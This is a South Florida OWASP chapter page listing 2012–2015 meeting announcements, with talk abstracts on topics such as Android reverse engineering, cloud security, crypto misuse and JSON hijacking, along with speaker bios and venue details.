South Florida

South florida OWASP Location Sponsor:

Local News
Note To CISSP &amp; CISA Holders: OWASP Meetings can count towards CPE Credits.

Be sure to hook up with us on the social network of your choice to recieve updates on our events!

Facebook

Twitter

LinkedIn

Wednesday, October 28, 2015 - 6:00pm - SFLOWASP Special October Event: Lobotomy - Android Reverse Engineering Framework

We will be providing a recap of OWASP AppSecUSA 2015 so plan ahead and mark your calendars!

Talk 1: Lobotomy 


 * New Format, New Location for this meeting *** Lecture Style (as usual) meeting will be held at 6:00PM to give everyone some time to show up.

Abstract: Lobotomy

This presentation will serve as an introduction for those who want to dive into the art of reverse engineering Android applications and firmware. We will explore the inner workings of the Android architecture, traverse the landscape of reverse engineering tools and techniques, and propose some practical methodologies and workflows for all your bug hunting needs.

Ben Watson has over 7 dedicated years in application and mobile security. Prior to joining GuidePoint Security, Ben has been solving mobile & application security problems for cutting edge companies in the financial services, eCommerce, and medical industries. Often Ben has been sought after for building application security programs from the ground up. This is due to his experience in not only developing testing methodologies, tools, and techniques, but his understanding and perspective around what it requires to build secure products. Ben has managed and lead efforts in large mobile application security service initiatives, and is also an experienced mobile security researcher. He currently focuses his efforts around discovering new exploitable vulnerability patterns in Android and iOS. He also has multiple published zero day vulnerabilities effecting various Android web browsers, and is the creator and curator of the Android assessment toolkit called Lobotomy.

Of course afterwards, we will find a local watering hole (TBD) as customary for a community team building event. First round is on OWASP South Florida.

There is paid for parking in the building. There may be cheaper parking nearby. We truly apologize for the parking situation, we are trying to get that sorted but may be unable to prior to the event.

Facility Location: Akamai Prolexic 200 E. Las Olas Blvd, Suite 900, Fort Lauderdale, FL)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, September 30, 2015 - 5:30pm - South Florida OWASP Meeting – 1 great talk and networking after

We will be providing a recap of OWASP AppSecUSA 2015 so plan ahead and mark your calendars!

Talk 1: OWASP AppSecUSA Recap 

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room 4030 (4th floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

May 2015 Joint SFISSA & OWASP Meeting – Thursday, May 21st, 5:30 – 9:00p at The Scripps Research Institute (TSRI)

Talk 1:Cybersecurity Risks and Controls around Cloud Environments

Virtualization, and by extension Cloud Computing, have created amazing benefits for IT in the forms of increased agility and efficiency with a decrease in spending on physical infrastructure, power, & cooling. With these great operational benefits also comes a new concentration of risk by the addition of the Hypervisor and all of the corresponding tools for management and automation. During this discussion we will examine the typical IT journey towards Cloud Computing and map back how the existing security & compliance controls available in the industry today may or may not provide adequate compensating controls for that risk. Finally we will discuss the gaps in those control sets and how an IT organization can work to augment their existing controls to fill in the gaps and once again provide a secure and compliant IT infrastructure.

Bio: Keith Cowan

Keith Cowan is a Senior Systems Engineer with HyTrust, a leader in cloud security and compliance. Keith earned a MBA in Business Administration from Dowling College and started his career with Computer Associates (now CA Technologies). Pursuant to a successful tenure at CA Technologies, Keith joined Internet Security Systems (ISS). At ISS, he was the Senior Systems Engineer for the NYC metro area, working with different verticals including Government and Financials building environments utilizing the ISS portfolio. Keith later moved on to Websense, as a Senior Sales Engineer handling NYC metro accounts, across all verticals. Keith’s time as Websense helped him understand the DLP market, and address security exposures at various customer accounts across all verticals, and help drive PCI, HIPPA, and SOX compliance. Keith has been an IT Security professional for over 17 years with a focus on pre and post sales support management, system design, SAN implementation, security practices/implementation, system integration, project management and resource coordination.

Talk 2: SSL/TLS, CA Issuance Transparency and the future of Authenticated Encryption

SSL/TLS and Certificate Authorities have been the subject of some not so pleasant discussion lately. What with all the browser, SSL/TLS exploits and adversaries breaching CAs to issue fake certificates for domains they don’t even own. There are big questions like, can I currently browse the internet securely and feel safe about my privacy? In this talk we will go over the current state of SSL/TLS, current concepts/fixes, certificate issuance transparency in order to detect bad behavior and the possible future of Authenticated Encryption.

Bio: Evan Wagner

Evan Wagner has been in the web development industry since the mid-late 90s. He got his start when he would go to the library on Howard AFB, in Republic of Panama, to upload his websites, via floppy disc, to Geocities. He purchased his first domain name (Webmastersland.com) in 1999 and started his hosting company in 2000. It was about that time he became a Linux breakfast cereal kid, installing Linux on everything and taking on any tasks he could to prove to people the power of Linux. After years of this he found himself in positions of increasing responsibility. Just to name a few: DBA for Florida Cancer Specialists ($1Bn+ yearly revenue), Various DevOps roles, Networking roles (BGP,SS7), International SMS/MMS communication engineering (tracing messages from handset to handset as well as deploying solutions to carriers) at Interop Technologies, Sr. Software Architect and currently Systems Software Engineer within Security Engineering at Akamai Technologies. During all this time security has always been always been a focus as he has seen first hand many exploits/attempts over the years and how to mitigate them.

Facility Location: The Scripps Institute The meeting will take place in the auditorium in Building B

Venue and Directions

Directions from the North (via Florida Turnpike or I-95)

On the turnpike exit at Indiantown Road, drive east to I-95 and go south one exit to Donald Ross Road (I-95 exit #83). Exit and drive east (left turn at exit traffic light). Turn left onto Central Blvd. Drive around the first traffic circle to the entrance of Scripps Florida (just beyond intersection of Main Street). Park in the “Visitor” parking in front of Building B. Check in with the security guard in Building B.

Directions from the South (via Florida Turnpike or I-95)

From the turnpike exit at PGA Blvd., drive east to I-95 and then go north one exit to Donald Ross Road (I-95 exit #83). Exit and drive east (right turn at exit traffic light). Turn left onto Central Blvd. Drive around the first traffic circle to the entrance of Scripps Florida (just beyond intersection of Main Street). Park in the “Visitor” parking in front of Building B. Check in with the security guard in Building B.

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, March 18, 2015 - 5:30pm - South Florida OWASP Meeting – 2 great talks and networking after

This is the first meeting for 2015! We have an excellent line up of speakers, topics, and networking scheduled for you so plan ahead and mark your calendars!

Talk 1: Application Security - A fresh perspective

Breaches are in the news as never before and it is clear that application security is falling behind. Different technologies are being introduced and application security does not appear to be keeping up with these changes.

In this talk we will discuss some different approaches that have been successfully employed by several leading technology organizations. These include creating attack aware applications using application sensors, continuous deployment and the advantages of bug bounty programs.

Bio: Rohini Sulatycki

Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization, mobile and external network tests in her capacity at Trustwave. She has also conducted Secure Development Training classes for clients worldwide. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC.

Talk 2: Crypto: Doing it wrong

Cryptography is a dark art to many developers. Errors in implementations can appear. This talk is design to highlight the last few implementation flaws and how attackers can abuse them.

Bio: Moses Hernandez

My name is Moses Hernandez. I’ve been in the Information Security ‘industry’ professionally since the late 90′s. Having worked in and around the industry for as long as I have, you get to wear many hats and see many things. From Network Engineering and Architecture and also getting involved in Software, Applications, Development and other aspects of computer science I have no business being in. He has worked for SANS as a Instructor for their Penetration Testing Courses as well as worked for at an Architect Capacity for many years. He is currently employed with Cisco Systems. If you want to talk about the intricacies of building scalable networks or get down in debugging software we can have both conversations comfortably. But you know what really gets me going? People, Companies, Software, and our community.

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room 4030 (4th floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, Oct 15, 2014 - 5:30pm - Joint South Florida OWASP & ISSA Meeting – 2 great talks and networking after

Our October 2014 meeting will be the annual joint meeting between the South Florida ISSA chapter the South Florida OWASP chapter. We have an excellent line up of speakers, topics, and networking scheduled for you so plan ahead and mark your calendars!

Talk 1: Software Security Assurance: Keeping your security program on the rails

In working with dozens of organizations across all industries, a common theme has emerged as it relates to effective implementation of software security assurance programs: they generally are not effective. In fact, in numerous cases, programs are often shelved outright after several years of multiple implementation attempts. An obvious downside of this failure is a lack of return on security technology investments. The reasons for failure vary, but it often comes down to an absence of management commitment, a lack of focus, or simply insufficient awareness and education amongst stakeholders. This presentation explores why programs do not get off the ground or flounder after launch, and what can and should be done to prevent or correct those situations. Developers, project leads, architects and information security managers will benefit from discussions about the key elements to effective security program implementation.

Bio: Bruce Jenkins

Bruce C Jenkins, CISSP, leads HP Fortify’s Software Security Assurance (SSA) enablement strategy and works regularly with customers on SSA program development and measurement. He is a 28-year US Air Force veteran who has been a Fortify evangelist and builder of SSA solutions since 2007. He has supported more than 60 professional services engagements and collected data on more than 350 security assessments across all industry sectors. Bruce hold a BS in computer science and MS in management science.

Talk 2: AppSec at DevOps Speed and Portfolio Scale

Software development is moving much faster than application security with new platforms, languages, frameworks, paradigms, and methodologies like Agile and Devops. Unfortunately, software assurance hasn't kept up with the times. For the most part, our security techniques were built to work with the way software was built in 2002. Here are some of the technologies and practices that today's best software assurance techniques *can't*handle: JavaScript, Ajax, inversion of control, aspect-oriented programming, frameworks, libraries, SOAP, REST, web services, XML, JSON, raw sockets, HTML5, Agile, DevOps, WebSocket, Cloud, and more. All of these rest pretty much at the core of modern software development. Although we're making progress in application security, the gains are much slower than the stunning advances in software development. After 10 years of getting further behind every day, software *assurance* is now largely incompatible with modern software *development*. It's not just security tools -- application security processes are largely incompatible as well. And the result is that security has very little influence on the software trajectory at all. Unless the application security community figures out how to be a relevant part of software development, we will continue to lag behind and effect minimal change. In this talk, I will explore a radically different approach based on instrumenting an entire IT organization with passive sensors to collect realtime data that can be used to identify vulnerabilities, enhance security architecture, and (most importantly) enable application security to generate value. The goal is unprecedented real-time visibility into application security across an organization's entire application portfolio, allowingall the stakeholders in security to collaborate and finally become proactive.

[[Media: 2014-10_OWASP_SF_Continuous.pdf]]

Bio: Jeff Williams Jeff Williams is a founder and CEO of Aspect Security and recently launched Contrast Security, a new approach to application security analysis. Jeff was an OWASP Founder and served as Global Chairman from 2004 to 2012, contributing many projects including the OWASP Top Ten, WebGoat, ESAPI, ASVS, and more. Jeff is passionate about making it possible for anyone to do his or her own continuous application security in real time.

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1052 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, May 21, 2014 - 5:00pm - South Florida OWASP Meeting – 2 great talks and networking after

Talk 1: Agile Security

Agile, DevOps, and the Security Practioner? I have worked in this business for almost 15 years now. I left for a few years because of the misery of the industry. Or so I thought? I really went to go find myself. When I came back I found that I was a different person. What I learned about working outside of Information Security is that we really have lost touch and have stopped relating with our peers. I felt the schism very much so. Lets fix that. This talk is about our Industry and about us. Its about Culture, People over Tools, what we need to do to be successful, and how we need to work together. Its about what the next 15 years will be for us and why its important that we much adopt and change the way we are.

If you don’t understand the fight or flight moment we all face then we will be replaced with those who do understand it. It’s not that we won’t be subject matter experts, or that we are not some of the brightest minds in our fields. The problem is we can’t get out of own way. In this mostly visually impactful, entertaining talk, I present a way out. We must be brave to embrace it. Most of all, we must start that education process now, because we are already behind the eight ball. This talk is built like a sermon, almost religious like, because make no mistakes, The way to solve the problem is to start re-thinking who we are and why we are here. The time is now.

Bio: Moses Hernandez

My name is Moses Hernandez. I’ve been in the Information Security ‘industry’ professionally since the late 90′s. Having worked in and around the industry for as long as I have, you get to wear many hats and see many things. From Network Engineering and Architecture and also getting involved in Software, Applications, Development and other aspects of computer science I have no business being in.

He has worked for SANS as a Instructor for their Penetration Testing Courses as well as worked for at an Architect Capacity for many years. He is currently employed with Cisco Systems. If you want to talk about the intricacies of building scalable networks or get down in debugging software we can have both conversations comfortably. But you know what really gets me going? People, Companies, Software, and our community.

Talk 2: 3rd party application software controls

All businesses depend on software from third-party software providers and commercial off-the-shelf software (COTS) vendors. Organizations can hope the software from third parties is built securely, but hope isn’t a viable security strategy. Recent breaches highlight that understanding risks introduced by third party software can impact an organization’s confidentiality, integrity and availability. However, a recent study by PWC highlighted that only 20% of organizations consider the impact of 3rd party risk in their security strategy. The FS-ISAC published controls for addressing third party risks in your software. This presentation talks through the 3 technical controls recommended and how you can benefit from them.

Bio: Rishi Pande

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room 4030(4th Floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, March 19, 2014 - 5:00pm - South Florida OWASP Meeting – 2 great talks and networking after

Talk 1: Classification, Facets, and Conceptual Space in Security Analysis and the Use of Patterns

Security is a complicated field. It involves many different situations, technologies, vulnerabilities, policies and regulations, with challenges that differ from one domain to the next. At the same time, security must be comprehensive. It is not sufficient to be good at only some things, or in some areas. The patterns community has responded to the challenge by documenting best practices in the form of patterns. To date, there are more than 400 security patterns, and the number keeps growing, which creates a problem of its own. How do you know which patterns address your situation? We haven’t solved this problem. But we have made progress by redefining the task from “How do you classify patterns?” to “How do you divide up the problem space into meaningful regions of concern where useful patterns might be found?” In this talk we describe a method of subdividing concerns specific to the problem of security, based to George Miller’s idea of concept grids. An interesting feature of this work is that it creates a framework for discussing security concerns and investigating spaces that aren’t covered, as well as those that are.

Bio: Dr. Van Hilst is an associate professor in the Farquhar College of Arts and Sciences at Nova Southeastern University. Prior to joining Nova, he taught at Florida Atlantic University, served as VP for Technology at a firewall startup, and was a member of the technical staff at HP Labs in Palo Alto. Earlier he worked on data analysis at Harvard University, code development at IBM Research, and signal processing for the French government. Dr. Van Hilst earned his PhD in Computer Science from the University of Washington and holds three degrees from MIT. He is the author of more than 40 articles on security and software engineering.

[[Media:Vanhilst_owasp_140319.pdf]]

Talk 2: Secure by Design

Building security into the SDLC is essential to creating secure applications. The cost of security issues identified during during an application penetration test or code review can be exponentially higher than addressing these security concerns earlier in the SDLC. This talk will address integrating security into the requirements,architecture and design process. We will walk through misuse cases, threat modeling and review security design patterns.

Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization, mobile and external network tests in her capacity at Trustwave. She has also conducted Secure Development Training classes for clients worldwide. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC.

[[Media:Sulatycki_Secure-By-Design_140319.pdf]]

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room (4th Floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, September 25, 2013 - 5:00pm - South Florida OWASP Meeting – Joint meeting with South Florida ISSA, networking after

Talk 1: BYOP: Bring Your Own Policy

How to write (by consensus) Information Security, Internet use and privacy policies, come away with a policy written by the group. (and you will see why it’s hard to please everyone). We will start with a downloaded sample BYOD / smartphone policy, talk about the basics, what is BYOD, legal issues, security issues, safety issues and write a BYOD / mobile device policy. Takeaways include 15 most important policies, policy checklist, Sample BYOD / smartphone policy

Bio: Michael Scheidell is a recognized expert in the information security and privacy community with a strong history of innovation and entrepreneurship. Frequent conference speaker and subject matter expert in InfoSec and Digital Privacy issues. Developed a suite of IT security products with impressive results—including a patented intrusion detection system, an award-winning email security solution and a revolutionary IT Risk and Assessment framework currently used by large multinational companies, healthcare organizations and financial institutions to ensure their privacy and security. Certified CISO (C|CISO), Member FBI Infragard, ISSA, ISACA, IAPP. Managing Director of Security Privateers.

''Talk 2: What's Hiding in Your Software Components? Hidden Risks of Component-Based Software''

Software is no longer written, it's assembled. With 80% of a typical application now being assembled from components, it's time to take a hard look at the new risks posed by this type of development -- and the processes and tools that we'll need in order to keep them in check.

Join Ryan Berg, Sonatype CSO, as he shares real world data on component risks, outlines the scope of the problem, and proposes approaches for managing these risk. You'll learn how security professionals can work cooperatively with application developers to reduce risk AND boost developer efficiency.

Bio: Ryan is the Chief Security Officer at Sonatype. Before joining Sonatype, Ryan was a co-founder and chief scientist for Ounce Labs which was acquired by IBM in 2009. Ryan holds multiple patents and is a popular speaker, instructor and author, in the fields of security, risk management, and secure application development.

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3035 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, July 17th, 2013 - 6:00pm - South Florida OWASP Meeting – Great talk and networking after

Talk 1: A Security Reference Architecture for Cloud Systems

Reference architectures (RAs) are becoming useful tools to understand and build complex systems and many cloud providers and software product vendors have developed versions of them. However, until now few security reference architectures have appeared. Almost all of them use rather imprecise models and this appears to be the first attempt to define them more precisely. We propose here a Security Reference Architecture (SRA) defined using UML models and incorporating our approach to build secure systems. By SRA we mean a RA where security services have been added in appropriate places to provide some degree of security for the complete cloud environment. We use as starting point our own cloud reference architecture and we combine security patterns and misuse patterns to build a secure reference architecture. By checking if a threat, expressed as a misuse pattern, can be stopped or mitigated in the secure reference architecture, we can evaluate its level of security. We have done a systematic enumeration of cloud threats and have started building a catalog of cloud misuse patterns; with a complete catalog we can apply them systematically and use the reference architecture to find where we should add corresponding security patterns to stop them. We are also building a catalog of cloud security patterns; security patterns join the extensive knowledge accumulated about security with the structure provided by patterns to provide guidelines for secure system design and evaluation.

Bio: Eduardo B. Fernandez is a professor in the Department of Computer Science and Engineering at Florida Atlantic University, Boca Raton, Florida. He is now a Visiting Professor at Universidad Tecnica Federico Santa María, Valparaiso, Chile. He has published numerous papers on security models, and object-oriented analysis/design, including two books on security patterns. He has lectured all over the world at both academic and industrial meetings. His current interests include software architecture, cloud computing, and security patterns. He holds a MS degree in Electrical Engineering from Purdue University and a Ph.D. in Computer Science from UCLA. He is a Senior Member of the IEEE, and a Member of ACM. He is an active consultant for industry. More details: http://www.cse.fau.edu/~ed

[[Media:SecResearchOWASP7-2013.pdf]]

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 Knight Lecture Hall Auditorium 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, April 24th, 2013 - 5:00pm - South Florida OWASP Meeting – Two great talks and networking after

Join us for our April meeting where we will have two great talks. Please note that the scheduled talks are for 60 minutes each with a small break in between. We will have a networking event after as usual.

Talk 1: Threat Modeling

As we focus on the threats that plaque our organizations we not only need to understand the threat but also understand the steps used by the attackers. Profiling these attacks enables threat modeling allowing yourself and your organization to understand how to successfully position yourself against threat actors and adversaries. In this session I will share some high level attack profiles or patterns and how we should look at them to successfully set your organizational course and security strategy. I will also share some detailed models which he has previously developed to help organizations successfully model for web application threats.

Bio:James Robinson is Head of Security Architecture and a Strategy Officer at Websense. His key responsibilities are internal security strategy development, innovation, and Websense Strategy. James brings more than a decade of both IT and product engineering security leadership to Websense. He has previously held senior positions with Fortune 150 and Fortune 100 companies including: Emerson Electric, Anheuser- Busch and State Farm Insurance and holds more than 10 industry certifications. Throughout his career James has delivered solutions for network architecture and application security, penetration testing, incident response, security and risk assessment, forensics and investigations and product security.

Talk 2: Adding Security to BPEL Workflows of Web Services

BPEL (Business Process Enterprise Language) is a language for web services composition and several implementations of it exist. For BPEL to be effective, it is necessary that it provides more support for security. BPEL doesn’t present any means to specify security constraints for workflows. BPEL through its activities tries to provide specific functional aspects and any non-functional aspects are expected to be addressed by other (lower-level) specifications. We present here a way to specify security requirements in BPEL. Since BPEL describes workflows, we present its activities using UML activity diagrams, where we apply a threat enumeration approach to determine the required security mechanisms to stop these threats. Our approach goes beyond BPEL and can be applied to BPMN and other business flow languages.

Bio:Ola Ajaj is a PhD candidate in the Dept. of Computer and Electrical Engineering and Computer Science at Florida Atlantic University, Boca Raton, Florida. His current interests include secure systems, web services, cloud computing, and mobile platforms. He holds a MS degree in Computer Engineering from Florida Atlantic University. While completing his education, he worked for Motorola, BlackBerry (RIM before) and IBM. He has published papers on patterns for web services standards, and he continues his PhD dissertation under Dr. Eduardo B. Fernandez supervision.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1052 Located on the 1st floor Eastside of the Building 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

Wednesday, February 27th, 2013 - 5:00pm - South Florida OWASP Meeting – One great talk and networking after

Join us for our first meeting of 2013 where we will have one great talk: The OWASP Top 10 2013 rc1!. Our event sponsor, NoVA will also be there with some important announcements

Talk: OWASP Top 10 2013 rc1

The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic methods to protect against these high risk problem areas and provides guidance on where to go from there. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. The OWASP Top 10 was initially released in 2003 and minor updates were made in 2004, 2007, and 2010.

The latest and greatest OWASP Top 10 2013 rc1 has just been released! Come and get a first hand view of the changes to the OWASP Top 10. Make sure that you don't miss this great opportunity to start the year right!

Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, Incident Response, and Payment Application testing for Trustwave's clients. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization, mobile and external network tests in her capacity at Trustwave. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC on topics such as Web application security, Ajax security concerns and Flash application security.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall (Room 1124) 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

Wednesday, Nov 28, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our November meeting where we will have two great talks. Please note that the scheduled talks are for 45 minutes each with a small break in between. We will have a networking event after as usual.

Talk 1: Keis Air Vulnerabilities

In this talk, the security issues found (CVE-2012-5858, CVE-2012-5859) in the default installation of the Kies Air Android application bundled with every new Samsung Galaxy S3 will be uncovered. A shell script will be released making detection of running Kies Air simple to explore while bypassing device administration to obtain phone contents or the option to crash the application at will. This is the result of private research and the findings will be publicly disclosed along with tools and a whitepaper.

Bio: Claudio J. Lacayo causes 500 response errors in web applications and is currently evangelizing the use of native code over frameworks.

Talk 2: The Story Behind the Dirt Jumper SQL Injection Whitepaper - An Analysis of DDoS C&C Vulnerabilities The team from Prolexic Technologies PLXsert will talk about their research on vulnerabilities within the Dirt Jumper DDoS botnet. This research has been featured in multiple global media outlets and made international headlines. The talk will discuss the methods, tools, and techniques that were used in the discovery of this vulnerability and the implications for the future of DDoS infrastructures. PLXsert will also discuss the latest trends, techniques, and methodologies being utilized in the DDoS threatscape.

http://arstechnica.com/security/2012/08/ddos-take-down-manual/

http://www.theregister.co.uk/2012/08/15/dirt_jumper_ddos_tool_flaw/

http://threatpost.com/en_us/blogs/researchers-find-flaw-dirt-jumper-bot-081512

http://www.csoonline.com/article/714000/popular-dirt-jumper-ddos-toolkit-riddled-with-security-flaws-research-finds

http://www.darkreading.com/vulnerability-management/167901026/security/news/240005474/prolexic-exposes-vulnerabilities-in-dirt-jumper-ddos-toolkit-family.html

http://www.xakep.ru/post/59168/ Bio: PLXsert monitors malicious cyber threats globally and analyzes DDoS attacks using proprietary techniques and equipment. Through digital forensics and post-attack analysis, PLXsert is able to build a global view of DDoS attacks, which is shared with customers and the security community. By identifying the sources and associated attributes of individual attacks, the PLXsert team helps organizations adopt best practices and make more informed, proactive decisions about DDoS threats.

Please vote on our new poll and let us know what future topics you would like to see presented at our meetings this year : http://www.linkedin.com/groupItem?view=&gid=2462364&type=member&item=101892186&qid=641ae738-dc10-48a0-8eaa-64b664bf99f2&trk=group_most_popular-0-b-ttl&goback=.gmp_2462364

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room TBD 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

Wednesday, Sept 26, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our September meeting where we will have two great talks. Please note that the scheduled talks are for 30 minutes each with a small break in between. We will have a networking event after as usual. Our event sponsor, NoVA will also be there with some important announcements

Talk 1: Application Vulnerability Assessment Risk (AVAR) Score During application vulnerability assessment a number of vulnerabilities may be discovered. Issues discovered during this assessment are given a risk score value or a rating of High, Medium, or Low; mostly based on the Common Vulnerability Scoring System (CVSS) or Common Weakness Enumeration (CWE) risk classification of known vulnerabilities. The industry application vulnerability risk classification models assign a risk level to an issue based on the impact of the specific vulnerability. They do not put into consideration the likelihood of occurrence based on known reported incidents or the impact of interdependencies between related vulnerabilities. The AVAR Score has implemented an approach that provides a holistic analysis on the risk of an application based on the interdependencies of related vulnerabilities and the probability of occurrence. Bio: An avid learner, Jummy has a degree in Engineering Physics but has always been interested in information security and she decided to make a career of it. Over the years, Jummy’s work has included application vulnerability assessments, security audits, and risk assessments for a wide variety of local, national, and international organizations. When she is not occupied with work she tries to invent new cooking recipes and she also volunteers as a mentor to young adults.

Talk 2: JSON Hijacking

JavaScript Object Notation (JSON) is a language and platform independent format for data interchange. JSON is in widespread use with a number of JSON parsers and libraries available for different languages. While some information is available for JSON Hijacking this attack is not very well understood.

Rohini Sulatycki will give an overview of this attack as well as provide a demonstration.

Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, Incident Response, and Payment Application testing for Trustwave's clients. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization and external network tests in her capacity at Trustwave. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC on topics such as Web application security, Ajax security concerns and Flash application security.

Please vote on our new poll and let us know what future topics you would like to see presented at our meetings this year : http://www.linkedin.com/groupItem?view=&gid=2462364&type=member&item=101892186&qid=641ae738-dc10-48a0-8eaa-64b664bf99f2&trk=group_most_popular-0-b-ttl&goback=.gmp_2462364

Facility Location: NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Knight Lecture Hall (Room 1124) 3301 College Ave Fort Lauderdale, FL 33314-7796 Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

Wednesday, June 27, 2012 - 6:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our June meeting where we will have two great talks. Please note that the scheduled talks are for 30 minutes each with a small break in between. We will have a networking event after as usual.

Talk 1: Bad encryption implementations using PBKDF2 

PBKDF2 is a popular way to generate long encryption keys from human-memorable passwords and passphrases. Used properly, it can keep encrypted sensitive data safe from attackers long enough for its ultimate compromise to be almost moot (assuming the attacker doesn't lose interest and give up first). Used badly, in conjunction with poorly-implemented AES encryption, it will protect sensitive data for approximately 5 minutes against an attacker with a 2 year old laptop and a list of compromised real-world passwords obtained from popular websites.

Presenter Bio: Jeff Skubick is a security analyst with more than a decade of professional experience developing mobile and web applications for companies like Verizon, and a lifetime of recreational hacking that extends far enough back into childhood to remember what happens when you JSR to $FFD2. His second language was 6502 assembly. As a teenager, he doubled his Amiga’s RAM by soldering piggybacked chips onto the motherboard, then spent 10 minutes on the phone with Dave Haynie learning what a "slow PAL" was. In his spare time, he invalidates warranties, builds robots, and takes liberties with local building codes in the name of home automation. He will never, ever make the mistake of buying another Motorola Android phone with a locked bootloader.

Talk 2: Mobile Framework vulnerabilities

